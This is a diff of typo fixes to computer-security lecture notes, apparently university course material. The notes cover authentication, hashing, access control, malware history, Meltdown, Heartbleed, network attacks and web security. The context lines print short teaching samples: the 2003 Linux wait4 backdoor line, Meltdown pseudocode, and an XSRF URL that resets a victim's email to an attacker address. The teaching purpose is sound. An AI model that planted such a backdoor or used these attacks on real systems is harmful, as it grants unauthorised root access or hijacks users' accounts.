| `DSA` | ❌ | ❌ | ✅ | Discrete Logs | ✅ | 256 |
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
- Users must be *identified* to enable:
|
||||
- User specific access controls
|
||||
- Individuals accountability for activities
|
||||
- Individuals’ accountability for activities
|
||||
- Claimed identities must be authenticated
|
||||
- First line of system protection
|
||||
- Safeguards against abuse by external parties or unauthorised insiders
|
||||
@@ -14,7 +14,7 @@
|
||||
2. Something the user *has*
|
||||
- a card, a token
|
||||
3. Something the user *is*
|
||||
- a bio-metric so a finger print or the users face
|
||||
- a biometric, so a fingerprint or the user’s face
|
||||
|
||||
#### Passwords
|
||||
|
||||
@@ -38,7 +38,7 @@ Ease of use is often because users have not been made to use them properly
|
||||
|
||||
#### Current Guidance on Password Systems
|
||||
|
||||
- The latest NIST recommendation advise:
|
||||
- The latest NIST recommendations advise:
|
||||
- Against automatic password expiry
|
||||
- Passwords should only be changed when there’s a reason
|
||||
- Against imposing rules for complex passwords
|
||||
@@ -62,7 +62,7 @@ Browsers can now auto-generate passwords for us
|
||||
|
||||
Some devices may not support password entry
|
||||
|
||||
- For example dictating a password to an Alexa or google home
|
||||
- For example dictating a password to an Alexa or Google Home
|
||||
- Mobile devices with small keyboards can be tricky
|
||||
|
||||
#### Token-based Authentication
|
||||
@@ -75,14 +75,14 @@ Some devices may not support password entry
|
||||
- Wearable devices
|
||||
- Smartphones
|
||||
|
||||
Often combined with a secret knowledge to form a 2-stage / 2-factor authentication
|
||||
Often combined with secret knowledge to form 2-stage / 2-factor authentication
|
||||
|
||||
- e.g. using an ATM requires card and pin
|
||||
|
||||
Smartphone apps can proveide the same functionality as authentication tokens (i.e. computing OTP)
|
||||
Smartphone apps can provide the same functionality as authentication tokens (i.e. computing OTP)
|
||||
|
||||
- The users no longer need a separate, dedicated device
|
||||
- Think nationwide card reader for transfers
|
||||
- Think Nationwide card reader for transfers
|
||||
- Relies on the security of the smartphone
|
||||
- User authentication on the device and or the app
|
||||
- Prevention of compromise via attacks
|
||||
@@ -122,9 +122,9 @@ Biometrics can be copied, but not easily
|
||||
- **E**qual **E**rror **R**ate (**EER**)
|
||||
- The point at which FAR and FRR coincide
|
||||
- The measure normally used to assess biometric products
|
||||
- Failure to Enroll
|
||||
- Errors in which the system is unable to establish as biometric template for a proposed user
|
||||
- e.g. some people don’t have finger prints, some reglions require face covering
|
||||
- Failure to Enrol
|
||||
- Errors in which the system is unable to establish a biometric template for a proposed user
|
||||
- e.g. some people don’t have fingerprints, some religions require face covering
|
||||
- Failure to Acquire
|
||||
- Errors in which the system is unable to successfully acquire the information required to make a decision
|
||||
|
||||
@@ -142,11 +142,11 @@ Developers focus can change on implementation. For example if being used as a pa
|
||||
- **Verification**
|
||||
- User claims an identity - authentication against that identity
|
||||
- One-to-one match (1:1)
|
||||
- Less unique characteristics can be ultised
|
||||
- Less unique characteristics can be utilised
|
||||
- **Identification**
|
||||
- Users’ biometric sample is compared against all in database
|
||||
- One-to-Many match (1:N)
|
||||
- Only the more unique biometrics can be ultised - fingerprints, iris, retina etc
|
||||
- Only the more unique biometrics can be utilised - fingerprints, iris, retina etc
|
||||
|
||||
### 2-Factor Authentication
|
||||
|
||||
|
||||
@@ -29,7 +29,7 @@
|
||||
|
||||
### Hash Functions
|
||||
|
||||
- Another crptographic primitive
|
||||
- Another cryptographic primitive
|
||||
- Takes a message of any length, and returns a pseudorandom hash of fixed length
|
||||
|
||||
$$
|
||||
@@ -80,7 +80,7 @@ Using a **one-way hash function** is a much better solution
|
||||
- This is trying possible passwords and seeing if we have a hash collision with the password list
|
||||
- Usually done via brute force however difficulty is $\{char\space count\}^{length}$
|
||||
- Online: You do not have the hash, and are instead attempting to gain access to an actual login terminal
|
||||
- Online is usually atempted via phising
|
||||
- Online is usually attempted via phishing
|
||||
|
||||

|
||||
|
||||
@@ -95,9 +95,9 @@ Using a **one-way hash function** is a much better solution
|
||||
##### Password Salting
|
||||
|
||||
- We can improve security by pre-pending a random *salt* to a password before hashing
|
||||
- The salt is stored unencrpted with the hash
|
||||
- If a hacker has a list of hashed passwords, and three of them are the same, he can summise they’re all a common password.
|
||||
- Salting adds non-secrete randomness to passwords
|
||||
- The salt is stored unencrypted with the hash
|
||||
- If a hacker has a list of hashed passwords, and three of them are the same, he can surmise they’re all a common password.
|
||||
- Salting adds non-secret randomness to passwords
|
||||
|
||||

|
||||
|
||||
|
||||
@@ -4,7 +4,7 @@ The reference monitor is an abstract concept
|
||||
|
||||
> An access control concept that refers to an abstract machine that mediates all access to objects by subjects
|
||||
|
||||
- Must be tamper proof
|
||||
- Must be tamper-proof
|
||||
- Must *always be invoked* when access to an object is required
|
||||
- Must be small enough to be verifiable / subject to analysis to ensure correctness
|
||||
|
||||
@@ -12,7 +12,7 @@ The reference monitor is an abstract concept
|
||||
|
||||
- Can be placed anywhere within the system
|
||||
- Hardware - dedicated registers for defining privileges
|
||||
- Operating system kernel - virtual machine hyper-visor
|
||||
- Operating system kernel - virtual machine hypervisor
|
||||
- Operating system - Windows security reference monitor
|
||||
- Services layer - `JVM`, `.NET`
|
||||
- Application layer - Firewalls
|
||||
@@ -61,7 +61,7 @@ In practice, Windows and Unix only use Ring 0&3 to save on overhead
|
||||
|
||||
### Controlled Invocation
|
||||
|
||||
- Many functions are helf at kernel level, but are quite reasonably called from within user level code
|
||||
- Many functions are held at kernel level, but are quite reasonably called from within user-level code
|
||||
- Network and File IO
|
||||
- Memory allocation
|
||||
- Halting the CPU (at shutdown only)
|
||||
@@ -105,7 +105,7 @@ Processing an Interrupt
|
||||
|
||||

|
||||
|
||||
We got immediately in to ring 0
|
||||
We go immediately into ring 0
|
||||
|
||||
However where we go next is dictated by the `sysenter` pointer, users cannot write to `sysenter`
|
||||
|
||||
@@ -144,15 +144,15 @@ However where we go next is dictated by the `sysenter` pointer, users cannot wri
|
||||
###### Meltdown
|
||||
|
||||
- In most operating systems, the entire kernel is stored in the upper address space
|
||||
- Pages in this area are flagged as supervisor, and cannot be access outside ring 0
|
||||
- Pages in this area are flagged as supervisor, and cannot be accessed outside ring 0
|
||||
- Meltdown is an exploit that allows us to read this privileged memory
|
||||
- We do this using a *side-channel*
|
||||
|
||||

|
||||
|
||||
- In Intel CPUs, it’s common to speculatively evaluate code prior reaching it
|
||||
- In Intel CPUs, it’s common to speculatively evaluate code prior to reaching it
|
||||
- E.g. conditionals
|
||||
- **Significant** speed up
|
||||
- **Significant** speed-up
|
||||
- No harm done, changes are just rolled back
|
||||
- But the **cache isn’t rolled back**
|
||||
- This is called side-channelling and cache timing
|
||||
@@ -183,4 +183,3 @@ x = memory[data * 4096];
|
||||
- Mask out single bit
|
||||
- Access user memory at that location
|
||||
- If we repeat we can read all memory in kernel space
|
||||
|
||||
@@ -13,14 +13,14 @@
|
||||
|
||||
#### Authentication & Authorisation
|
||||
|
||||
- Subject / Principle - an active entity
|
||||
- Subject / Principal - an active entity
|
||||
- Object - resource being accessed
|
||||
- Access operation
|
||||
- Reference monitor - grants or denies access
|
||||
|
||||

|
||||
|
||||
**Principle**
|
||||
**Principal**
|
||||
|
||||
> “An entity that can be granted access to objects or can make statements affecting access control decisions”
|
||||
|
||||
@@ -57,7 +57,7 @@ Files or resources - memory, printers, directories
|
||||
- **Mandatory**: There could be a system-wide policy
|
||||
- e.g. a government with different levels of security (top secret, level 3 clearance, etc)
|
||||
- Not commonly used for businesses
|
||||
- Most OS’s support the concept of ownership
|
||||
- Most OSs support the concept of ownership
|
||||
|
||||
### Unix
|
||||
|
||||
@@ -76,7 +76,7 @@ Files or resources - memory, printers, directories
|
||||
|
||||
##### UID & GID
|
||||
|
||||
- Usernames in unix are soft aliases, your UID is what determines permissions
|
||||
- Usernames in Unix are soft aliases; your UID is what determines permissions
|
||||
- User identities: UID
|
||||
- Group identities: GID
|
||||
- Your IDs are stored in `/etc/passwd`
|
||||
@@ -92,7 +92,7 @@ Files or resources - memory, printers, directories
|
||||
#### Root (Unix Superuser)
|
||||
|
||||
- Root’s UID 0 is actually hard coded into the Linux kernel at multiple points
|
||||
- In 2003, this anonymous change was made to the error value return in the `wait4` function is Linux:
|
||||
- In 2003, this anonymous change was made to the error value return in the `wait4` function in Linux:
|
||||
|
||||
```
|
||||
if ((options == (_WCLONE|__WALL)) && (current->uid = 0))
|
||||
@@ -107,15 +107,15 @@ Note: single `=`. This was a backdoor which sets the current uid to 0, giving ro
|
||||
- Separate superuser duties (e.g. daemon, uucp)
|
||||
- Never use root as normal user
|
||||
- Audit `su` and `sudo` usage
|
||||
- In unix, everything is a file
|
||||
- In Unix, everything is a file
|
||||
- Files really represent resources
|
||||
- Organised in a tree structure, with alterations depending on the file system
|
||||
- I-nodes store permission information
|
||||
- Every resource as a owner and a group
|
||||
- Every resource has an owner and a group
|
||||
|
||||
###### I-nodes
|
||||
|
||||
- I-nodes in unix store the metadata for files
|
||||
- I-nodes in Unix store the metadata for files
|
||||
- Each file name links to an i-node which stores security information
|
||||
|
||||
```
|
||||
@@ -155,11 +155,10 @@ Directory permissions are slightly different to files:
|
||||
|
||||
### Linux Security Modules
|
||||
|
||||
- SInce 2.6, linux provides the ability to hook into security calls
|
||||
- Since 2.6, Linux provides the ability to hook into security calls
|
||||
- This adds the ability to perform more complex Mandatory Access Control after standard Unix DAC
|
||||
- DAC check happens irrespective of whether SM is operationa.
|
||||
- DAC check happens irrespective of whether SM is operational.
|
||||
|
||||

|
||||
|
||||
- If the security module fails, it does not matter as the discretionary access check has already run.
|
||||
|
||||
@@ -4,14 +4,14 @@ Windows Architecture
|
||||
|
||||

|
||||
|
||||
Note: windows has `kernel mode drivers` and `user mode drivers`
|
||||
Note: Windows has `kernel mode drivers` and `user mode drivers`
|
||||
|
||||
### Security Subsystem
|
||||
|
||||
- Runs in user mode
|
||||
- `Logon` processes (`winlogon`, `LogonUI`)
|
||||
- Local security authority (`LSA`)
|
||||
- Checks Users accounts
|
||||
- Checks users’ accounts
|
||||
- Provides access token
|
||||
- Responsible for auditing
|
||||
- Security Account manager (`SAM`)
|
||||
@@ -29,7 +29,7 @@ Note: windows has `kernel mode drivers` and `user mode drivers`
|
||||
### Access Control Matrix
|
||||
|
||||
- Access rights are defined individually for each combination of subject and object
|
||||
- Quite an abstract concept, bit would allow for very fine grained control
|
||||
- Quite an abstract concept, but would allow for very fine-grained control
|
||||
- Not practical, think of the memory required in scaling it up
|
||||
|
||||

|
||||
@@ -52,38 +52,38 @@ The access control list can be found by right clicking on a file -> properties -
|
||||
|
||||
### Access Control
|
||||
|
||||
- Access control in windows treats more than just files, also:
|
||||
- Access control in Windows treats more than just files, also:
|
||||
- Registry keys
|
||||
- Active directory objects
|
||||
- Groups
|
||||
- Inheritance is implemented
|
||||
- File can inherit ACLs from parent directories
|
||||
|
||||
#### Principles
|
||||
#### Principals
|
||||
|
||||
- Principles are more broadly defined as well:
|
||||
- Principals are more broadly defined as well:
|
||||
- Local users
|
||||
- Domain users
|
||||
- Groups
|
||||
- Machines
|
||||
|
||||
Each principles has a human readable name and security ID (`SID`)
|
||||
Each principal has a human-readable name and security ID (`SID`)
|
||||
|
||||
```
|
||||
S-1-5-21-2475811070-2421845406-3333283485-1005
|
||||
S-1-5-21-1664130791-3153540899-3044996548-279530
|
||||
```
|
||||
|
||||
These are examples of `SID` from windows, but why are they so long?
|
||||
These are examples of `SID` from Windows, but why are they so long?
|
||||
|
||||
This is a form of future proofing. Imagine company A buys company B, you can merge the users onto one active directory without two `SID`s clashing. (also 96 bits of memory isn’t a lot in the grand scheme of things)
|
||||
|
||||
##### Local / Domain Principles
|
||||
##### Local / Domain Principals
|
||||
|
||||
- LSA creates local principles
|
||||
- principle = `MACHINE\principal`
|
||||
- Domain principles adminstered on DC by domain admins
|
||||
- principle@domain = DOMAIN\principle
|
||||
- LSA creates local principals
|
||||
- principal = `MACHINE\principal`
|
||||
- Domain principals administered on DC by domain admins
|
||||
- principal@domain = DOMAIN\principal
|
||||
- net user /domain
|
||||
- net group /domain
|
||||
- net localgroup /domain
|
||||
@@ -99,7 +99,7 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
|
||||
#### Objects
|
||||
|
||||
- Objects are passive entities in access operations
|
||||
- In windows:
|
||||
- In Windows:
|
||||
- Executive objects (processes, threads, etc)
|
||||
- Private objects (files, directories)
|
||||
- Securable objects have a security descriptor
|
||||
@@ -108,7 +108,7 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
|
||||
|
||||
### Access Tokens
|
||||
|
||||
- Instead of passing a number as in linux, we pass an access token
|
||||
- Instead of passing a number as in Linux, we pass an access token
|
||||
- It is the security credentials for a login session stored in the **access token**
|
||||
- Identifies the user, the user’s groups, and the user’s privileges
|
||||
|
||||
@@ -116,22 +116,22 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
|
||||
|
||||
- Windows subjects: Processes and threads
|
||||
- New processes get a **copy** of the parent access token, possibly modified
|
||||
- Individual access token are immutable and can live beyond policy changes
|
||||
- Individual access tokens are immutable and can live beyond policy changes
|
||||
- The access token checked is the one given at login, not the current access token
|
||||
- This is a TOCTTOU issue (Time-of-check to Time-of-use)
|
||||
- Admins can force a user to logoff to update their access token
|
||||
- Admins can force a user to log off to update their access token
|
||||
|
||||
### User Account Control
|
||||
|
||||
- After Vista, administrator users do not use an administrative access token by default
|
||||
- Users have two tokens, one heavily restricted and used by default
|
||||
- A prompt allows a user to spawn a process with the adminstrative token, or switch a process’ token.
|
||||
- A prompt allows a user to spawn a process with the administrative token, or switch a process’ token.
|
||||
- Similar to `sudo`
|
||||
- Can be swapped mid-execution
|
||||
|
||||
#### Domains
|
||||
|
||||
- Single sing-on for network resources
|
||||
- Single sign-on for network resources
|
||||
- Centralised security administration
|
||||
- Domain controller (DC)
|
||||
- Handles user accounts and access control
|
||||
@@ -140,7 +140,7 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
|
||||
|
||||
#### Interactive Logon
|
||||
|
||||
- The windows interactive logon allows a user to authenticate
|
||||
- The Windows interactive logon allows a user to authenticate
|
||||
- Windows logon begins with the Secure Attention Sequence `Ctrl+Alt+Del`
|
||||
- Can prevent spoofing - is tied directly to `winlogon`
|
||||
- The logon process differs slightly for local and domain authentication
|
||||
@@ -150,7 +150,7 @@ This is a form of future proofing. Imagine company A buys company B, you can mer
|
||||
1. `Ctrl+Alt+Del` initiates a login prompt using `GINA`
|
||||
2. These collect credentials which are passed to the `LSA`
|
||||
3. The `LSA` uses `NTLM` to check the credentials against the `SAM` database
|
||||
4. Successful login an access token, which is used to spawn a shell (explorer.exe)
|
||||
4. Successful login produces an access token, which is used to spawn a shell (explorer.exe)
|
||||
|
||||

|
||||
|
||||
|
||||
@@ -32,7 +32,7 @@
|
||||
- A piece of self-replicating code
|
||||
- Propagates by attaching itself to a disk, file or document
|
||||
- When the file is run, the virus runs and attempts to proliferate
|
||||
- Installs without the users knowledge or consent
|
||||
- Installs without the user’s knowledge or consent
|
||||
|
||||
##### Notable Viruses
|
||||
|
||||
@@ -40,7 +40,7 @@
|
||||
- 1986: `Brain`, the first MS-DOS computer virus
|
||||
- 1989: `Ghostball`, the first multipartite virus - affects both `exe`s and the boot sector
|
||||
- 1995: First macro virus, `Concept`, affects MS Word documents
|
||||
- 1996: First linux virus, `Staog`, uses bugs in the linux kernel
|
||||
- 1996: First Linux virus, `Staog`, uses bugs in the Linux kernel
|
||||
|
||||
#### Worms
|
||||
|
||||
@@ -52,9 +52,9 @@
|
||||
|
||||
##### Notable Worms
|
||||
|
||||
- 1988: The Morris Worm, affects BSD unix machines. One of the first known buffer overruns
|
||||
- 1988: The Morris Worm, affects BSD Unix machines. One of the first known buffer overruns
|
||||
- 2000: The `ILOVEYOU` worm, one of the most damaging worms ever, used social engineering to get people to install it.
|
||||
- Used the file name `LOVE-LETTER-FOR-YOU.txt.vbs` as windows didn’t show the file type in the file name
|
||||
- Used the file name `LOVE-LETTER-FOR-YOU.txt.vbs` as Windows didn’t show the file type in the file name
|
||||
|
||||

|
||||
|
||||
@@ -64,11 +64,11 @@
|
||||
- SQL Slammer - fastest spreading worm, crashed the internet (only 376 bytes or 1 UDP packet)
|
||||
- Even when the network was crippled, the occasional UDP packet could be transmitted and further damage the network
|
||||
- MS Blaster - Windows XP mainly, crashes RPC and reboots your machine
|
||||
- Spreading between machines on a internal network easily, no port filtering
|
||||
- Used a buffer overflow in a windows Remote Procedure Call (RPC) service - spreads without the user clicking
|
||||
- Spreading between machines on an internal network easily, no port filtering
|
||||
- Used a buffer overflow in a Windows Remote Procedure Call (RPC) service - spreads without the user clicking
|
||||
- Compromised machines performed DDOS on `windowsupdate.com`
|
||||
- Netsky - Infected email attachment, actually removed other worms as part of a *worm war*
|
||||
- Sasser - From the author of Netsky, attacks windows `LSASS`
|
||||
- Sasser - From the author of Netsky, attacks Windows `LSASS`
|
||||
- Spread 17 days after a patch to the vulnerability was released by Microsoft
|
||||
- Buffer overflow in the Local Security and Authority Subsystem Service `LSASS`
|
||||
- Scans IP addresses and infects via port 445
|
||||
@@ -98,28 +98,28 @@
|
||||
|
||||
- A malicious program pretending to be a legitimate application
|
||||
- Often obtained in email attachments or at malicious websites
|
||||
- Don’t replicated themselves - *user error*
|
||||
- Randomware is the most common form of Trojan now
|
||||
- Don’t replicate themselves - *user error*
|
||||
- Ransomware is the most common form of Trojan now
|
||||
|
||||
#### Notable Trojans
|
||||
|
||||
- 1989: The AIDS Trojan, encrypts all files filenames on the system and request random
|
||||
- 2002: Beast, affects windows machines from 95-XP and provides the attack with a remote admin tool (RAT) - there are a lot of these types
|
||||
- 2013: Cryptolocker - massive randomware
|
||||
- 1989: The AIDS Trojan, encrypts all files’ filenames on the system and requests ransom
|
||||
- 2002: Beast, affects Windows machines from 95-XP and provides the attacker with a remote admin tool (RAT) - there are a lot of these types
|
||||
- 2013: Cryptolocker - massive ransomware
|
||||
|
||||
##### Ransomware
|
||||
|
||||
- Will usually encrypt or block access to files and demand ransom
|
||||
- It is a clever solution, because if an anti-virus removes it, it is often too late
|
||||
- Usually distributed on malicious websites, or to already infected machines
|
||||
- The file decryption keys are protected by encrpyting using the *public key of a C&C server*
|
||||
- The file decryption keys are protected by encrypting using the *public key of a C&C server*
|
||||
|
||||
###### Ransomware Variants
|
||||
|
||||
- Most the challenge in successfully using randomware is tricking a user into running it, and bypassing anti-virus and browser protection
|
||||
- Most of the challenge in successfully using ransomware is tricking a user into running it, and bypassing anti-virus and browser protection
|
||||
- Fake emails
|
||||
- Malicious web pages
|
||||
- Obfuscated javascript attachments
|
||||
- Obfuscated JavaScript attachments
|
||||
- Deployed using *exploit kits*
|
||||
|
||||
##### CryptoWall JS Example
|
||||
|
||||
@@ -68,7 +68,7 @@ void function(char *str)
|
||||
|
||||
###### Stack Canaries
|
||||
|
||||
- Stack canaries modify the prologue and epilogue of all functions to check a value ion front of the return address is unchanged
|
||||
- Stack canaries modify the prologue and epilogue of all functions to check a value in front of the return address is unchanged
|
||||
|
||||

|
||||
|
||||
@@ -77,7 +77,7 @@ void function(char *str)
|
||||
###### Data Execution Prevention (NX)
|
||||
|
||||
- Modern operating systems will mark the stack as non-executable
|
||||
- `NX` on AMD, `XD` on Intel and `XN` on arm
|
||||
- `NX` on AMD, `XD` on Intel and `XN` on ARM
|
||||
- An `NX` stack means that adding in our exploit code won’t work
|
||||
- We can circumvent this using a `return-to-libc` attack
|
||||
|
||||
@@ -85,12 +85,12 @@ void function(char *str)
|
||||
|
||||
- To defeat `ret2lib2` various `0x0` null bytes are inserted into standard library addresses
|
||||
- Developers also restrict access to obvious system calls
|
||||
- Address Space Layout Randomisation (`ASLR`) moves the address of library and programs around
|
||||
- Address Space Layout Randomisation (`ASLR`) moves the addresses of libraries and programs around
|
||||
- They don’t have to move too much before your hand-crafted `ret` addresses will break
|
||||
|
||||
###### Return-Oriented Programming
|
||||
|
||||
- Lets forget about injecting code, how about just using existing code in the actual exploitable program
|
||||
- Let’s forget about injecting code, how about just using existing code in the actual exploitable program
|
||||
- No individual section of this program will do what we want
|
||||
- Find short sections, *gadgets* and link them together
|
||||
|
||||
@@ -142,6 +142,6 @@ if (r >= 0 && s->msg_callback)
|
||||
s, s->msg_callback_arg);
|
||||
```
|
||||
|
||||
This bug would just memcpy a bunch of the server’s ram and send it back to the client. This can expose RSA keys.
|
||||
This bug would just memcpy a bunch of the server’s RAM and send it back to the client. This can expose RSA keys.
|
||||
|
||||
This is called a **buffer overread** attack.
|
||||
@@ -67,7 +67,7 @@ Tunnel mode
|
||||
|
||||
##### ARP Cache Poisoning
|
||||
|
||||
- We can simply send an unrequested ARP reply, and overwrite the MAC address in a hosts ARP cache with our own
|
||||
- We can simply send an unrequested ARP reply, and overwrite the MAC address in a host’s ARP cache with our own
|
||||
|
||||

|
||||
|
||||
@@ -82,7 +82,7 @@ Tunnel mode
|
||||
- DNS translates domain names into IP addresses
|
||||
- DNS packets are UDP
|
||||
- Stateless on the transport layer
|
||||
- DNS resolvers will cache the IP for awhile
|
||||
- DNS resolvers will cache the IP for a while
|
||||
|
||||
##### DNS Spoofing
|
||||
|
||||
@@ -99,8 +99,8 @@ Tunnel mode
|
||||
|
||||
### Denial of Service
|
||||
|
||||
- A denial of service attack is an attempt to make a machine or network resource unavaliable to its authorised / intended users
|
||||
- This will usually involve flooding a machine with enough requests that it can’t server its legitimate purpose
|
||||
- A denial of service attack is an attempt to make a machine or network resource unavailable to its authorised / intended users
|
||||
- This will usually involve flooding a machine with enough requests that it can’t serve its legitimate purpose
|
||||
- ping flood
|
||||
- A distributed denial of service occurs where there is more than one attacking machine
|
||||
|
||||
@@ -110,13 +110,13 @@ Tunnel mode
|
||||
- Attack never finishes 3-way handshake
|
||||
- Victim is busy with the timeout
|
||||
- Attack initiates large number of syn requests
|
||||
- Victim reaches it’s half-open connection limit
|
||||
- Victim reaches its half-open connection limit
|
||||
|
||||

|
||||
|
||||
#### Amplification Attacks
|
||||
|
||||
- Regular attacks are your bandwidth vs your targets
|
||||
- Regular attacks are your bandwidth vs your target’s
|
||||
- Amplification attacks utilise some aspect of a network protocol to *increase the bandwidth* of an attack
|
||||
|
||||

|
||||
@@ -144,7 +144,7 @@ Tunnel mode
|
||||
|
||||
##### NTP Amplification
|
||||
|
||||
- NTP is a protocol for synchronsing time between machines
|
||||
- NTP is a protocol for synchronising time between machines
|
||||
- Extremely similar to DNS amplification
|
||||
- `MON_GETLIST` request returns the list of the last 600 contacts
|
||||
- Gives 200x amplification
|
||||
@@ -158,4 +158,3 @@ Tunnel mode
|
||||
- Apache2 creates a new thread for each connection
|
||||
- More connections slow the server down significantly
|
||||
- The attack only sends bytes of data at a time making it extremely easy to do
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
- A hardware and/or software system
|
||||
- Prevents unauthorised access of packets from one network to another
|
||||
- All data leave any subnet must pass through it
|
||||
- All data leaving any subnet must pass through it
|
||||
|
||||

|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
#### DMZ
|
||||
|
||||
- A demilitarised zone is a small subnet that separates exrternally facing services from the internal network
|
||||
- A demilitarised zone is a small subnet that separates externally facing services from the internal network
|
||||
|
||||

|
||||
|
||||
@@ -38,7 +38,7 @@
|
||||
**Firewalls are not enough**
|
||||
|
||||
- Cannot protect against attacks that bypass the firewall
|
||||
- e.g. tunneling
|
||||
- e.g. tunnelling
|
||||
- Cannot protect against internal threats or insiders
|
||||
- Might help a bit by egress filtering
|
||||
- Network firewalls cannot always protect against the transfer of virus-infected programs or files
|
||||
@@ -105,7 +105,7 @@ $ iptables -A INPUT -i eht0 -p tcp --dport 80 -j ACCEPT
|
||||
$ iptables -A OUTPUT -i eht0 -p tcp --sport 80 -j ACCEPT
|
||||
```
|
||||
|
||||
- Remember `http` requests are not sent from the client’s port 80, it is sent from a random high numbered port
|
||||
- Remember `http` requests are not sent from the client’s port 80; they are sent from a random high-numbered port
|
||||
- This is how clients can have multiple web requests open at the same time
|
||||
|
||||
##### Policies
|
||||
@@ -139,8 +139,8 @@ iptables -A OUTPUT -s 192.168.0.2 -j ACCEPT
|
||||
#### Packet Filter Issues
|
||||
|
||||
- Packet filters are simple, low-level and have high assurance
|
||||
- However they cannot:
|
||||
- Prevent attacks that employ application specific vulnerabilities
|
||||
- However:
|
||||
- They cannot prevent attacks that employ application-specific vulnerabilities
|
||||
- Do not support higher-level authentication schemes
|
||||
- Easy to accidentally allow or deny packets incorrectly
|
||||
|
||||
@@ -149,7 +149,7 @@ iptables -A OUTPUT -s 192.168.0.2 -j ACCEPT
|
||||
- Understand requests and replies (`ACK/SYN`)
|
||||
- Dynamically generate rules
|
||||
- Based on what it sees from TCP handshakes (can be FTP or SSH etc)
|
||||
- Can support policies for a wider range or protocols
|
||||
- Can support policies for a wider range of protocols
|
||||
- `IPTABLES` has a module for stateful packet filtering
|
||||
- Allow incoming / outgoing SSH connections
|
||||
|
||||
@@ -184,7 +184,7 @@ iptables -A OUTPUT -s 192.168.0.2 -j ACCEPT
|
||||
|
||||
### Network Address Translation
|
||||
|
||||
The shortage of IP addresses mean that most routers now perform NAT automatically
|
||||
The shortage of IP addresses means that most routers now perform NAT automatically
|
||||
|
||||

|
||||
|
||||
|
||||
@@ -1,8 +1,8 @@
|
||||
# Internet Security
|
||||
|
||||
#### Internet Treat Models
|
||||
#### Internet Threat Models
|
||||
|
||||
- Different to other treat models:
|
||||
- Different to other threat models:
|
||||
- The attacker isn’t in control of the network
|
||||
- The attacker hasn’t got access to the target’s OS
|
||||
|
||||
@@ -28,13 +28,13 @@
|
||||
|
||||
- Cookies are associated with the domains that produced them
|
||||
- `amazon.com` cookies don’t go to `google.com`
|
||||
- Some websites include request to other domains, such as 3rd party advertisers
|
||||
- Some websites include requests to other domains, such as 3rd party advertisers
|
||||
- These serve cookies *a lot*
|
||||
- This is how advertiser companies know what ads you’ve been served and what adverts you’ve clicked on
|
||||
|
||||
### Cookie Vulnerabilities
|
||||
|
||||
- How a website uses a cookies is up to the server
|
||||
- How a website uses a cookie is up to the server
|
||||
- Many create a `SID` to authenticate users, for example to *keep me logged on*
|
||||
- Obtaining this cookie - *cookie stealing* - lets you **hijack** their session
|
||||
- `HTTP` Cookies can be stolen simply by monitoring
|
||||
@@ -52,7 +52,9 @@
|
||||
- A malicious URL that inserts an exploit directly into the page returned by a server
|
||||
- Consider a 404 page at some address
|
||||
- If we embed code into the url
|
||||
|
||||
- 
|
||||
|
||||
- Modern browsers will throw up a warning
|
||||
|
||||
##### Persistent XSS
|
||||
@@ -65,15 +67,17 @@
|
||||
###### The Samy Worm
|
||||
|
||||
- In 2005 Samy Kamkar wrote an XSS-based attack on MySpace
|
||||
|
||||
- 
|
||||
|
||||
- Fastest spreading virus of all time
|
||||
|
||||
### Preventing XSS
|
||||
|
||||
- Wesbites must aggressively escape html characters from *any* user input / output
|
||||
- Websites must aggressively escape HTML characters from *any* user input / output
|
||||
1. Locate all positions in which a website handles untrusted data
|
||||
2. Escape appropriately depending on type of input
|
||||
- When you consider all of the things people input on interactive websites, this can be a rela problem
|
||||
- When you consider all of the things people input on interactive websites, this can be a real problem
|
||||
- You also need to find all of the bizarre obfuscated versions of XSS
|
||||
- Use an encoding library, which will handle all of these edge cases
|
||||
|
||||
@@ -81,20 +85,18 @@
|
||||
|
||||
- When a user puts in a `HTTP` request, they will also send any relevant session cookies
|
||||
- e.g. an `SID` from having logged in
|
||||
- If the user has already authenticated, a malicious URl can then perform some action on their account
|
||||
- If the user has already authenticated, a malicious URL can then perform some action on their account
|
||||
- `http://shop.com/account.php?act=editemail&e=attacker@mail.com`
|
||||
|
||||
#### XSRF in POST
|
||||
|
||||
- Most websites use POST, this is little defence
|
||||
- The phishing email just points to a convincing website with a malicious form on it
|
||||
|
||||
- 
|
||||
|
||||
#### Preventing XSRF
|
||||
|
||||
- XSS vulenerabilties make XSRF a lot easier
|
||||
- XSS vulnerabilities make XSRF a lot easier
|
||||
- Use **synchroniser tokens**
|
||||
- Each website form has a one-time token that the server validates when the form is submitted
|
||||
|
||||
|
||||
|
||||
Loaded 100 of 103 files, more files were not shown because too many files have changed in this diff.
Show more
Reference in new issue
Block a user